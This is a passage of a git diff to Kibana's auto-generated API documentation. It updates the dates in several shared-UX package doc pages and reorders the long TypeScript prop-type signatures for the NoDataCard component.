'./kbn_server_route_repository.devdocs.json'; diff --git a/api_docs/kbn_shared_svg.mdx b/api_docs/kbn_shared_svg.mdx index 0bbca3c598fb3..0011c0b234fd1 100644 --- a/api_docs/kbn_shared_svg.mdx +++ b/api_docs/kbn_shared_svg.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-svg title: "@kbn/shared-svg" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-svg plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-svg'] --- import kbnSharedSvgObj from './kbn_shared_svg.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx b/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx index 6d748a8ba37bf..6ed3fe23ad4ff 100644 --- a/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx +++ b/api_docs/kbn_shared_ux_button_exit_full_screen_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-button-exit-full-screen-mocks title: "@kbn/shared-ux-button-exit-full-screen-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-button-exit-full-screen-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-button-exit-full-screen-mocks'] --- import kbnSharedUxButtonExitFullScreenMocksObj from './kbn_shared_ux_button_exit_full_screen_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_button_toolbar.mdx b/api_docs/kbn_shared_ux_button_toolbar.mdx index 7291e9d778d22..ddbac049d370d 100644 --- a/api_docs/kbn_shared_ux_button_toolbar.mdx +++ b/api_docs/kbn_shared_ux_button_toolbar.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-button-toolbar title: "@kbn/shared-ux-button-toolbar" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-button-toolbar plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-button-toolbar'] --- import kbnSharedUxButtonToolbarObj from './kbn_shared_ux_button_toolbar.devdocs.json'; 
diff --git a/api_docs/kbn_shared_ux_card_no_data.devdocs.json b/api_docs/kbn_shared_ux_card_no_data.devdocs.json index 1d05bc72098a0..480849c369f6b 100644 --- a/api_docs/kbn_shared_ux_card_no_data.devdocs.json +++ b/api_docs/kbn_shared_ux_card_no_data.devdocs.json @@ -142,7 +142,7 @@ "signature": [ "Partial> & { button?: React.ReactNode; onClick?: React.MouseEventHandler | undefined; description?: React.ReactNode; category?: string | undefined; canAccessFleet?: boolean | undefined; }" + ", \"onClick\" | \"description\" | \"isDisabled\" | \"button\" | \"layout\">> & { button?: React.ReactNode; onClick?: React.MouseEventHandler | undefined; description?: React.ReactNode; category?: string | undefined; canAccessFleet?: boolean | undefined; }" ], "path": "node_modules/@kbn/shared-ux-card-no-data-types/index.d.ts", "deprecated": false, 
@@ -176,21 +176,21 @@ "\nProps for the `NoDataCard` sevice-connected component." ], "signature": [ - "{ children?: React.ReactNode; className?: string | undefined; id?: string | undefined; lang?: string | undefined; style?: React.CSSProperties | undefined; target?: string | undefined; role?: React.AriaRole | undefined; tabIndex?: number | undefined; display?: \"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"subdued\" | \"transparent\" | \"plain\" | undefined; href?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"true\" | \"false\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"true\" | \"false\" | undefined; 'aria-checked'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"true\" | \"false\" | undefined; 'aria-dropeffect'?: \"none\" | \"link\" | \"copy\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"true\" | \"false\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"true\" | \"false\" | undefined; 'aria-haspopup'?: boolean | \"dialog\" | \"grid\" | \"listbox\" | \"menu\" | \"tree\" | \"true\" | \"false\" | undefined; 'aria-hidden'?: boolean | \"true\" | \"false\" | undefined; 'aria-invalid'?: boolean | \"true\" | \"false\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | 
\"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiline'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiselectable'?: boolean | \"true\" | \"false\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-readonly'?: boolean | \"true\" | \"false\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"true\" | \"false\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"true\" | \"false\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"ascending\" | \"descending\" | \"other\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: 
React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChange?: React.FormEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onError?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | 
undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; 
onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: 
React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: 
React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; title?: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | undefined; button?: React.ReactNode; hidden?: boolean | undefined; icon?: React.ReactElement<", + "{ children?: React.ReactNode; onError?: React.ReactEventHandler | undefined; hidden?: boolean | undefined; icon?: React.ReactElement<", "EuiIconProps", - ", string | React.JSXElementConstructor> | null | undefined; image?: string | React.ReactElement> | undefined; description?: React.ReactNode; security?: string | undefined; defaultValue?: string | number | readonly string[] | undefined; category?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"off\" | \"on\" | undefined; inputMode?: \"none\" | \"text\" | \"search\" | \"email\" | \"tel\" | 
\"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; rel?: string | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | \"xl\" | \"xs\" | undefined; footer?: React.ReactNode; hasBorder?: boolean | undefined; textAlign?: CardAlignment | undefined; titleElement?: \"h2\" | \"h3\" | \"h4\" | \"h5\" | \"h6\" | \"span\" | undefined; titleSize?: \"s\" | \"xs\" | undefined; betaBadgeProps?: Partial<(", + ", string | React.JSXElementConstructor> | null | undefined; image?: string | React.ReactElement> | undefined; className?: string | undefined; title?: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | undefined; onChange?: React.FormEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; id?: string | undefined; description?: React.ReactNode; security?: string | undefined; defaultValue?: string | number | readonly string[] | undefined; lang?: string | undefined; category?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; style?: React.CSSProperties | undefined; tabIndex?: number | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; role?: React.AriaRole | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | 
undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"on\" | \"off\" | undefined; inputMode?: \"none\" | \"email\" | \"search\" | \"text\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"false\" | \"true\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"false\" | \"true\" | undefined; 'aria-checked'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"false\" | \"true\" | undefined; 'aria-dropeffect'?: \"none\" | \"copy\" | \"link\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"false\" | \"true\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"false\" | \"true\" | undefined; 'aria-haspopup'?: boolean | \"grid\" | \"menu\" | \"false\" | \"true\" | \"dialog\" | \"listbox\" | \"tree\" | undefined; 'aria-hidden'?: boolean | \"false\" | \"true\" | undefined; 'aria-invalid'?: boolean | \"false\" | \"true\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiline'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiselectable'?: boolean | 
\"false\" | \"true\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-readonly'?: boolean | \"false\" | \"true\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"false\" | \"true\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"false\" | \"true\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"other\" | \"ascending\" | \"descending\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; 
onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: 
React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler 
| undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; 
onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; href?: string | undefined; rel?: string | undefined; target?: string | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"xs\" | \"l\" | \"xl\" | undefined; button?: 
React.ReactNode; footer?: React.ReactNode; hasBorder?: boolean | undefined; textAlign?: CardAlignment | undefined; titleElement?: \"h2\" | \"h3\" | \"h4\" | \"h5\" | \"h6\" | \"span\" | undefined; titleSize?: \"s\" | \"xs\" | undefined; betaBadgeProps?: Partial<(", "CommonProps", " & ", "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
